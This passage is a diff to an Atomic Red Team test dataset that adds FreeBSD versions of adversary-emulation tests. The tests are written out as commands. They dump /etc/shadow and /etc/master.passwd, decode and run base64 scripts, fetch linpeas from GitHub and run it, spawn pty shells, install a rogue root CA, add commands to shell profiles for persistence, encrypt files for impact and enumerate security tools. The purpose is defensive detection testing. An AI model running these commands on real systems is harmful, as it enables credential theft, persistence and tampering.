-d\"; fi;\ncat /tmp/encoded.dat | $cmd > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug)))\"\n", "\"\\..\\ExternalPayloads\\temp_T1027.zip\\T1027.exe\"\n", @@ -538665,11 +540307,11 @@ { "description": "encode the command into base64 file\n", "prereq_command": "if [ -e \"/tmp/encoded.dat\" ]; then exit 0; else exit 1; fi\n", - "get_prereq_command": "echo \"#{shell_command}\" | base64 > /tmp/encoded.dat\n" + "get_prereq_command": "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"b64encode -r -\"; else cmd=\"base64\"; fi;\necho \"#{shell_command}\" | $cmd > /tmp/encoded.dat\n" } ], "executor": { - "command": "cat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "command": "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"b64decode -r\"; else cmd=\"base64 -d\"; fi;\ncat /tmp/encoded.dat | $cmd > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", "cleanup_command": "rm /tmp/encoded.dat \nrm /tmp/art.sh\n", "name": "sh" } @@ -545587,6 +547229,7 @@ ], "command_list": [ "cat /etc/pam.d/common-password\n", + "cat /etc/pam.d/passwd\n", "cat /etc/security/pwquality.conf\n", "cat /etc/pam.d/system-auth\ncat /etc/security/pwquality.conf\n", "cat /etc/login.defs\n", @@ -545661,6 +547304,18 @@ "name": "bash" } }, + { + "name": "Examine password complexity policy - FreeBSD", + "auto_generated_guid": "a7893624-a3d7-4aed-9676-80498f31820f", + "description": "Lists the password complexity policy to console on FreeBSD.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cat /etc/pam.d/passwd\n", + "name": "sh" + } + }, { "name": "Examine password complexity policy - CentOS/RHEL 7.x", "auto_generated_guid": "78a12e65-efff-4617-bc01-88f17d71315d", @@ -548817,6 +550472,7 @@ "command_list": [ "echo 'echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004' >> ~/.bash_profile\n", "echo 'echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004' >> ~/.bashrc\n", + "echo 'echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004' >> ~/.shrc\n", "echo '# Hello from Atomic Red Team T1546.004' >> /etc/profile\n", "echo '# Atomic Red Team was here... T1546.004' >> ~/.profile\n", "echo '# Atomic Red Team was here... T1546.004' >> /etc/profile.d/bash_completion.sh\n", @@ -548827,10 +550483,10 @@ "parsed_datasets": [ { "source": "atomics/T1546.004/T1546.004.yaml", - "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile and .bashrc", + "name": "Atomic Red Team Test - Event Triggered Execution: .bash_profile .bashrc and .shrc", "content": { "attack_technique": "T1546.004", - "display_name": "Event Triggered Execution: .bash_profile and .bashrc", + "display_name": "Event Triggered Execution: .bash_profile .bashrc and .shrc", "atomic_tests": [ { "name": "Add command to .bash_profile", @@ -548874,6 +550530,26 @@ "name": "sh" } }, + { + "name": "Add command to .shrc", + "auto_generated_guid": "41502021-591a-4649-8b6e-83c9192aff53", + "description": "Adds a command to the .shrc file of the current user\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "command_to_add": { + "description": "Command to add to the .shrc file", + "type": "string", + "default": "echo \"Hello from Atomic Red Team T1546.004\" > /tmp/T1546.004" + } + }, + "executor": { + "command": "echo '#{command_to_add}' >> ~/.shrc\n", + "cleanup_command": "head -n '-2' ~/.shrc > /tmp/T1546.004\nmv /tmp/T1546.004 ~/.shrc\n", + "name": "sh" + } + }, { "name": "Append to the system shell profile", "auto_generated_guid": "694b3cc8-6a78-4d35-9e74-0123d009e94b", @@ -551724,7 +553400,7 @@ "command_list": [ "echo \"passwd\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo AES-256 -o /tmp/passwd.gpg -c /etc/passwd\n", "$which_7z a -ppasswd /tmp/passwd.zip /etc/passwd\n", - "if [[ $USER == \"root\" ]]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; sudo su; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; sudo su; fi\n", + "if [ $USER == \"root\" ]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; sudo su; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; sudo su; fi\n", "$which_openssl genrsa -out /tmp/key.pem 2048\n$which_openssl rsa -in /tmp/key.pem -pubout -out /tmp/pub.pem\n$which_openssl rsautl -encrypt -inkey /tmp/pub.pem -pubin -in /etc/passwd -out /tmp/passwd.zip\n", "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n", "7z a -p ARTPass -mhe=on ARTArchive.7z ~/test.txt\n", @@ -551742,7 +553418,7 @@ "display_name": "Data Encrypted for Impact", "atomic_tests": [ { - "name": "Encrypt files using gpg (Linux)", + "name": "Encrypt files using gpg (FreeBSD/Linux)", "auto_generated_guid": "7b8ce084-3922-4618-8d22-95f996173765", "description": "Uses gpg to encrypt a file\n", "supported_platforms": [ @@ -551775,18 +553451,18 @@ { "description": "Finds where gpg is located\n", "prereq_command": "which_gpg=`which gpg`\n", - "get_prereq_command": "(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" + "get_prereq_command": "(which pkg && pkg install -y gnupg)||(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", "cleanup_command": "rm #{encrypted_file_path}\n" } }, { - "name": "Encrypt files using 7z (Linux)", + "name": "Encrypt files using 7z (FreeBSD/Linux)", "auto_generated_guid": "53e6735a-4727-44cc-b35b-237682a151ad", "description": "Uses 7z to encrypt a file\n", "supported_platforms": [ @@ -551814,18 +553490,18 @@ { "description": "Finds where 7z is located\n", "prereq_command": "which_7z=`which 7z`\n", - "get_prereq_command": "" + "get_prereq_command": "(which pkg && pkg install -y 7-zip)\n" } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}\n", "cleanup_command": "$which_7z e #{encrypted_file_path}\nrm #{encrypted_file_path}\n" } }, { - "name": "Encrypt files using ccrypt (Linux)", + "name": "Encrypt files using ccrypt (FreeBSD/Linux)", "auto_generated_guid": "08cbf59f-85da-4369-a5f4-049cffd7709f", "description": "Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory.\n", "supported_platforms": [ @@ -551853,23 +553529,23 @@ "default": "sudo su" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "Finds where ccencrypt and ccdecrypt is located and copies input file\n", - "prereq_command": "which_ccencrypt=`which ccencrypt`\nwhich_ccdecrypt=`which ccdecrypt`\nif [[ $USER == \"root\" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi\n", - "get_prereq_command": "(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n" + "prereq_command": "which_ccencrypt=`which ccencrypt`\nwhich_ccdecrypt=`which ccdecrypt`\nif [ $USER == \"root\" ]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi\n", + "get_prereq_command": "(which pkg && pkg install -y ccript)||(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n" } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, - "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", - "cleanup_command": "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" + "command": "if [ $USER == \"root\" ]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "cleanup_command": "if [ $USER == \"root\" ]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" } }, { - "name": "Encrypt files using openssl (Linux)", + "name": "Encrypt files using openssl (FreeBSD/Linux)", "auto_generated_guid": "142752dc-ca71-443b-9359-cf6f497315f1", "description": "Uses openssl to encrypt a file\n", "supported_platforms": [ @@ -551911,7 +553587,7 @@ } ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", "cleanup_command": "$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}\nrm #{encrypted_file_path}\n" @@ -561427,7 +563103,7 @@ } }, { - "name": "Masquerading as Linux crond process.", + "name": "Masquerading as FreeBSD or Linux crond process.", "auto_generated_guid": "a315bfff-7a98-403b-b442-2ea1b255e556", "description": "Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.\n\nUpon successful execution, sh is renamed to `crond` and executed.\n", "supported_platforms": [ @@ -579133,6 +580809,7 @@ ], "command_list": [ "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /usr/local/share/certs/\ncertctl rehash\n", "mv rootCA.crt /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"rootCA.crt\"\n", "$cert = Import-Certificate -FilePath rootCA.cer -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", @@ -579175,6 +580852,32 @@ "elevation_required": true } }, + { + "name": "Install root CA on FreeBSD", + "auto_generated_guid": "f4568003-1438-44ab-a234-b3252ea7e7a3", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cert_filename": { + "description": "Path of the CA certificate we create", + "type": "path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "path", + "default": "rootCA.key" + } + }, + "executor": { + "command": "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /usr/local/share/certs/\ncertctl rehash\n", + "cleanup_command": "rm /usr/local/share/certs/#{cert_filename}\ncertctl rehash\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Install root CA on Debian/Ubuntu", "auto_generated_guid": "53bcf8a0-1549-4b85-b919-010c56d724ff", @@ -581400,7 +583103,7 @@ { "name": "C compile", "auto_generated_guid": "d0377aa6-850a-42b2-95f0-de558d80be57", - "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "description": "Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.\n", "supported_platforms": [ "linux", "macos" @@ -581422,13 +583125,13 @@ ], "executor": { "command": "gcc #{input_file} && ./a.out\nclang #{input_file} && ./a.out\n", - "name": "bash" + "name": "sh" } }, { "name": "CC compile", "auto_generated_guid": "da97bb11-d6d0-4fc1-b445-e443d1346efe", - "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "description": "Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.\n", "supported_platforms": [ "linux", "macos" @@ -581450,13 +583153,13 @@ ], "executor": { "command": "g++ #{input_file} && ./a.out\nclang++ #{input_file} && ./a.out\n", - "name": "bash" + "name": "sh" } }, { "name": "Go compile", "auto_generated_guid": "78bd3fa7-773c-449e-a978-dc1f1500bc52", - "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "description": "Compile a go file with golang on FreeBSD, Linux or Macos.\n", "supported_platforms": [ "linux", "macos" @@ -581478,7 +583181,7 @@ ], "executor": { "command": "go run #{input_file}\n", - "name": "bash" + "name": "sh" } } ] @@ -589373,6 +591076,7 @@ "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\nget-process | ?{$_.Description -like \"*mc*\"}\nget-process | ?{$_.ProcessName -like \"*mc*\"}\nget-process | Where-Object { $_.ProcessName -eq \"Sysmon\" }\n", "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "pgrep -l 'bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'\n", "fltmc.exe | findstr.exe 385201\n", "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", "powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct\npowershell Get-WmiObject -Namespace root\\securitycenter2 -Class antivirusproduct\n", @@ -589441,6 +591145,18 @@ "name": "sh" } }, + { + "name": "Security Software Discovery - pgrep (FreeBSD)", + "auto_generated_guid": "fa96c21c-5fd6-4428-aa28-51a2fbecdbdc", + "description": "Methods to identify Security Software on an endpoint\nwhen sucessfully executed, command shell is going to display AV/Security software it is running.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "pgrep -l 'bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'\n", + "name": "sh" + } + }, { "name": "Security Software Discovery - Sysmon Service", "auto_generated_guid": "fe613cf3-8009-4446-9a0f-bc78a15b66c9", @@ -590791,10 +592507,10 @@ } ], "command_list": [ - "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", - "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", - "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n", - "which_python=$(which python || which python3 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit" + "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", + "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> T1059.006.py\necho 'malicious_command = \"sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n", + "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit" ], "commands": [], "queries": [], @@ -590825,7 +592541,7 @@ "default": "T1059.006-payload" }, "executor": { - "description": "Linux shell", + "description": "FreeBSD or Linux shell", "type": "string", "default": "sh" }, @@ -590839,18 +592555,18 @@ "dependencies": [ { "description": "Verify if python is in the environment variable path and attempt to import requests library.", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", "get_prereq_command": "pip install requests\n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", "name": "sh", - "cleanup_command": "rm #{payload_file_name} \n" + "cleanup_command": "rm #{payload_file_name} \n" } }, { - "name": "Execute Python via scripts (Linux)", + "name": "Execute Python via scripts", "auto_generated_guid": "6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8", "description": "Create Python file (.py) that downloads and executes shell script via executor arguments", "supported_platforms": [ @@ -590887,18 +592603,18 @@ "dependencies": [ { "description": "Requires Python\n", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", "get_prereq_command": "pip install requests \n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", "name": "sh", "cleanup_command": "rm #{python_script_name} #{payload_file_name} \n" } }, { - "name": "Execute Python via Python executables (Linux)", + "name": "Execute Python via Python executables", "auto_generated_guid": "0b44d79b-570a-4b27-a31f-3bf2156e5eaa", "description": "Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments\n", "supported_platforms": [ @@ -590940,12 +592656,12 @@ "dependencies": [ { "description": "Requires Python\n", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", "get_prereq_command": "pip install requests \n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", "name": "sh", "cleanup_command": "rm #{python_binary_name} #{python_script_name} #{payload_file_name}\n" } @@ -590960,13 +592676,13 @@ "dependencies": [ { "description": "Verify if python is in the environment variable path and attempt to import requests library.\n", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $? \n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $? \n", "get_prereq_command": "pip install requests\n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit", - "name": "bash" + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit", + "name": "sh" } } ] @@ -592998,16 +594714,16 @@ "display_name": "Resource Hijacking", "atomic_tests": [ { - "name": "macOS/Linux - Simulate CPU Load with Yes", + "name": "FreeBSD/macOS/Linux - Simulate CPU Load with Yes", "auto_generated_guid": "904a5a0e-fb02-490d-9f8d-0e256eb37549", "description": "This test simulates a high CPU load as you might observe during cryptojacking attacks.\nEnd the test by using CTRL/CMD+C to break.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "yes > /dev/null\n", - "name": "bash" + "name": "sh" } } ] @@ -597241,19 +598957,20 @@ ], "command_list": [ "sudo cat /etc/shadow > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "sudo cat /etc/master.passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", "cat /etc/passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", - "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt\n", - "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > /tmp/T1003.008.txt\ntestcat /etc/shadow > /tmp/T1003.008.txt\n" + "unamestr=$(uname)\nif [ \"$unamestr\" = 'Linux' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt; elif [ \"$unamestr\" = 'FreeBSD' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/master.passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt; fi\n", + "testcat(){ (while read line; do echo $line >> /tmp/T1003.008.txt; done < $1) }\n[ \"$(uname)\" = 'FreeBSD' ] && testcat /etc/master.passwd\ntestcat /etc/passwd\ntestcat /etc/shadow\n" ], "commands": [], "queries": [], "parsed_datasets": [ { "source": "atomics/T1003.008/T1003.008.yaml", - "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow", "content": { "attack_technique": "T1003.008", - "display_name": "OS Credential Dumping: /etc/passwd and /etc/shadow", + "display_name": "OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow", "atomic_tests": [ { "name": "Access /etc/shadow (Local)", @@ -597276,10 +598993,31 @@ "elevation_required": true } }, + { + "name": "Access /etc/master.passwd (Local)", + "auto_generated_guid": "5076874f-a8e6-4077-8ace-9e5ab54114a5", + "description": "/etc/master.passwd file is accessed in FreeBSD environments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "sudo cat /etc/master.passwd > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Access /etc/passwd (Local)", "auto_generated_guid": "60e860b6-8ae6-49db-ad07-5e73edd88f5d", - "description": "/etc/passwd file is accessed in Linux environments\n", + "description": "/etc/passwd file is accessed in FreeBSD and Linux environments\n", "supported_platforms": [ "linux" ], @@ -597297,9 +599035,9 @@ } }, { - "name": "Access /etc/{shadow,passwd} with a standard bin that's not cat", + "name": "Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat", "auto_generated_guid": "df1a55ae-019d-4120-bc35-94f4bc5c4b0a", - "description": "Dump 